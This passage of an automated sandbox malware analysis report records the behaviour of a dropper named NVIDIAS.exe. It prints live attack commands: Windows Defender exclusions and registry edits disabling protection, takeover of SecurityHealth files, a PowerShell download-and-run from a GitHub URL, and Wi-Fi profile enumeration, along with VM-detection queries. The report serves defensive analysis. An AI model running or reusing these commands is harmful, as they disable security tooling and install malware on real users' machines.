Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\QQQ\NVIDIAS.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\QQQ\NVIDIAS.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\QQQ\NVIDIAS.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\QQQ\NVIDIAS.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\QQQ\NVIDIAS.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\QQQ\NVIDIAS.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\QQQ\NVIDIAS.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\QQQ\NVIDIAS.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\QQQ\NVIDIAS.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\QQQ\NVIDIAS.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\QQQ\NVIDIAS.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\QQQ\NVIDIAS.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\QQQ\NVIDIAS.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\QQQ\NVIDIAS.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\QQQ\NVIDIAS.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\QQQ\NVIDIAS.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\QQQ\NVIDIAS.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\QQQ\NVIDIAS.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\QQQ\NVIDIAS.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\QQQ\NVIDIAS.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\QQQ\NVIDIAS.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\QQQ\NVIDIAS.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\QQQ\NVIDIAS.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\QQQ\NVIDIAS.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\QQQ\NVIDIAS.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\QQQ\NVIDIAS.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\QQQ\NVIDIAS.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\QQQ\NVIDIAS.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\QQQ\NVIDIAS.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\QQQ\NVIDIAS.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\QQQ\NVIDIAS.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\QQQ\NVIDIAS.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\QQQ\NVIDIAS.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\QQQ\NVIDIAS.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\QQQ\NVIDIAS.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\QQQ\NVIDIAS.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\QQQ\NVIDIAS.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\QQQ\NVIDIAS.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\QQQ\NVIDIAS.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\QQQ\NVIDIAS.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\QQQ\NVIDIAS.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\QQQ\NVIDIAS.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\QQQ\NVIDIAS.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\QQQ\NVIDIAS.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\QQQ\NVIDIAS.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\QQQ\NVIDIAS.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\QQQ\NVIDIAS.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\QQQ\NVIDIAS.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\QQQ\NVIDIAS.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\QQQ\NVIDIAS.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\QQQ\NVIDIAS.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\QQQ\NVIDIAS.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\QQQ\NVIDIAS.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\QQQ\NVIDIAS.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\QQQ\NVIDIAS.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\QQQ\NVIDIAS.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\QQQ\NVIDIAS.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\QQQ\NVIDIAS.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\QQQ\NVIDIAS.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\QQQ\NVIDIAS.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\QQQ\NVIDIAS.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\QQQ\NVIDIAS.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\QQQ\NVIDIAS.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\QQQ\NVIDIAS.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\QQQ\NVIDIAS.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\QQQ\NVIDIAS.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\QQQ\NVIDIAS.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\QQQ\NVIDIAS.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\QQQ\NVIDIAS.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\QQQ\NVIDIAS.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\QQQ\NVIDIAS.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\QQQ\NVIDIAS.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\QQQ\NVIDIAS.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\QQQ\NVIDIAS.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\QQQ\NVIDIAS.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\QQQ\NVIDIAS.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\QQQ\NVIDIAS.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\QQQ\NVIDIAS.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\QQQ\NVIDIAS.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\QQQ\NVIDIAS.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\QQQ\NVIDIAS.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\QQQ\NVIDIAS.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\QQQ\NVIDIAS.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\QQQ\NVIDIAS.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\QQQ\NVIDIAS.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\QQQ\NVIDIAS.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\QQQ\NVIDIAS.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\QQQ\NVIDIAS.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\netsh.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\netsh.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\taskkill.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Queries memory information (via WMI often done to detect virtual machines)

Source: C:\ProgramData\QQQ\NVIDIAS.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Speed FROM Win32_PhysicalMemory
Source: C:\ProgramData\QQQ\NVIDIAS.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_CacheMemory
Source: C:\ProgramData\QQQ\NVIDIAS.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from CIM_Memory
Source: C:\ProgramData\QQQ\NVIDIAS.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Capacity FROM Win32_PhysicalMemory

Queries pointing device information (via WMI, Win32_PointingDevice, often done to detect virtual machines)

Source: C:\ProgramData\QQQ\NVIDIAS.exe

WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Name FROM Win32_PointingDevice

Queries sensitive battery information (via WMI, Win32_Battery, often done to detect virtual machines)

Source: C:\ProgramData\QQQ\NVIDIAS.exe

WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT EstimatedChargeRemaining, BatteryStatus FROM Win32_Battery

Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)

Source: C:\ProgramData\QQQ\NVIDIAS.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_DiskDrive
Source: C:\ProgramData\QQQ\NVIDIAS.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_DiskDrive
Source: C:\ProgramData\QQQ\NVIDIAS.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_DiskDrive
Source: C:\ProgramData\QQQ\NVIDIAS.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_DiskDrive
Source: C:\ProgramData\QQQ\NVIDIAS.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Model, Size FROM Win32_DiskDrive

Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)

Source: C:\ProgramData\QQQ\NVIDIAS.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Name, MACAddress, Speed FROM Win32_NetworkAdapter WHERE MACAddress IS NOT NULL
Source: C:\ProgramData\QQQ\NVIDIAS.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Description, MACAddress, IPEnabled FROM Win32_NetworkAdapterConfiguration WHERE IPEnabled = TRUE

Queries sensitive physical memory information (via WMI, Win32_PhysicalMemory, often done to detect virtual machines)

Source: C:\ProgramData\QQQ\NVIDIAS.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Speed FROM Win32_PhysicalMemory
Source: C:\ProgramData\QQQ\NVIDIAS.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Capacity FROM Win32_PhysicalMemory

Queries sensitive printer information (via WMI, Win32_Printer, often done to detect virtual machines)

Source: C:\ProgramData\QQQ\NVIDIAS.exe

WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Name, Default FROM Win32_Printer

Queries sensitive service information (via WMI, Win32_LogicalDisk, often done to detect sandboxes)

Source: C:\ProgramData\QQQ\NVIDIAS.exe

WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT DeviceID, FileSystem, FreeSpace, Size FROM Win32_LogicalDisk WHERE DriveType = 3

Queries sensitive sound device information (via WMI, Win32_SoundDevice, often done to detect virtual machines)

Source: C:\ProgramData\QQQ\NVIDIAS.exe

WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Name FROM Win32_SoundDevice

Source: C:\ProgramData\QQQ\NVIDIAS.exe	Memory allocated: 33A0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\ProgramData\QQQ\NVIDIAS.exe	Memory allocated: 3550000 memory reserve \| memory write watch	Jump to behavior
Source: C:\ProgramData\QQQ\NVIDIAS.exe	Memory allocated: 5550000 memory reserve \| memory write watch	Jump to behavior
Source: C:\ProgramData\QQQ\NVIDIAS.exe	Memory allocated: 5A80000 memory reserve \| memory write watch	Jump to behavior
Source: C:\ProgramData\QQQ\NVIDIAS.exe	Memory allocated: 7A80000 memory reserve \| memory write watch	Jump to behavior
Source: C:\ProgramData\QQQ\NVIDIAS.exe	Memory allocated: 7CC0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\ProgramData\QQQ\NVIDIAS.exe	Memory allocated: 9CC0000 memory reserve \| memory write watch	Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 9926	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 9866	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 9911	Jump to behavior
Source: C:\ProgramData\QQQ\NVIDIAS.exe	Window / User API: threadDelayed 9783	Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7440	Thread sleep count: 9926 > 30	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1552	Thread sleep count: 9866 > 30	Jump to behavior
Source: C:\Windows\System32\timeout.exe TID: 7440	Thread sleep count: 87 > 30	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7956	Thread sleep count: 9911 > 30	Jump to behavior
Source: C:\Windows\System32\svchost.exe TID: 2480	Thread sleep time: -30000s >= -30000s

Source: C:\Windows\System32\svchost.exe

File opened: PhysicalDrive0

Source: C:\ProgramData\QQQ\NVIDIAS.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Manufacturer, Product FROM Win32_BaseBoard
Source: C:\ProgramData\QQQ\NVIDIAS.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT SMBIOSBIOSVersion FROM Win32_BIOS
Source: C:\ProgramData\QQQ\NVIDIAS.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Product, Manufacturer, SerialNumber FROM Win32_BaseBoard
Source: C:\ProgramData\QQQ\NVIDIAS.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Manufacturer, SMBIOSBIOSVersion, ReleaseDate FROM Win32_BIOS

Source: C:\ProgramData\QQQ\NVIDIAS.exe

WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * From Win32_ComputerSystem

Source: C:\ProgramData\QQQ\NVIDIAS.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\ProgramData\QQQ\NVIDIAS.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Name, NumberOfCores, MaxClockSpeed FROM Win32_Processor

Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed

Source: C:\ProgramData\QQQ\NVIDIAS.exe

File Volume queried: C:\ FullSizeInformation

Jump to behavior

Source: svchost.exe, 0000001F.00000002.2121016007.0000020FFFE87000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000002.2119395170.0000020FFEC2A000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: Amcache.hve.39.dr	Binary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
Source: NVIDIAS.exe, 00000015.00000002.1209998915.00000000017D6000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll))

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\System32\taskkill.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\ProgramData\QQQ\NVIDIAS.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Process token adjusted: Debug
Source: C:\Windows\SysWOW64\taskkill.exe	Process token adjusted: Debug

Source: C:\ProgramData\QQQ\NVIDIAS.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Adds a directory exclusion to Windows Defender

Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -command "Add-MpPreference -ExclusionPath "C:\ProgramData\QQQ
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -command "Add-MpPreference -ExclusionPath "C:\ProgramData\QQQ			Jump to behavior

Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\cacls.exe "C:\Windows\system32\cacls.exe" "C:\Windows\system32\config\system"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -window hidden -command ""	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\reg.exe REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /f /v "DisableBehaviorMonitoring" /t REG_DWORD /d 1	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\reg.exe REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /f /v "DisableOnAccessProtection" /t REG_DWORD /d 1	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\reg.exe REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /f /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d 1	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\reg.exe REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /f /v "DisableAntiSpyware" /t REG_DWORD /d 1	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\reg.exe reg delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /f /v "SecurityHealth"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\takeown.exe takeown /f "C:\Windows\System32\SecurityHealthService.exe"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\icacls.exe icacls "C:\Windows\System32\SecurityHealthService.exe" /grant:r "computer\user":F /c	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\takeown.exe takeown /f "C:\Windows\System32\SecurityHealthSystray.exe"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\icacls.exe icacls "C:\Windows\System32\SecurityHealthSystray.exe" /grant:r "computer\user":F /c	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /IM SecurityHealthSystray.exe /F	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -command "Add-MpPreference -ExclusionPath "C:\ProgramData\QQQ	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\timeout.exe timeout.exe /t 10	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\attrib.exe attrib +h "QQQ" /s /d	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Invoke-WebRequest 'https://github.com/pr0niums/Repo/raw/refs/heads/main/NVIDIAS.exe' -OutFile 'NVIDIAS.exe'"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\ProgramData\QQQ\NVIDIAS.exe NVIDIAS.exe	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\attrib.exe attrib +h "C:\ProgramData\QQQ\NVIDIAS.exe" /s /d	Jump to behavior
Source: C:\ProgramData\QQQ\NVIDIAS.exe	Process created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /c tasklist	Jump to behavior
Source: C:\ProgramData\QQQ\NVIDIAS.exe	Process created: C:\Windows\SysWOW64\cmd.exe "cmd" /C chcp 65001 && netsh wlan show profiles \| findstr All	Jump to behavior
Source: C:\ProgramData\QQQ\NVIDIAS.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C C:\Users\user\AppData\Local\Temp\tmp6F58.tmp.bat & Del C:\Users\user\AppData\Local\Temp\tmp6F58.tmp.bat	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\tasklist.exe tasklist	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\chcp.com chcp 65001
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\netsh.exe netsh wlan show profiles
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr All
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\chcp.com chcp 65001
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\taskkill.exe TaskKill /F /IM 716
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\timeout.exe Timeout /T 2 /Nobreak

Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /IM SecurityHealthSystray.exe /F			Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\taskkill.exe TaskKill /F /IM 716

Source: C:\ProgramData\QQQ\NVIDIAS.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion DigitalProductId

Jump to behavior

Source: C:\Windows\System32\cmd.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
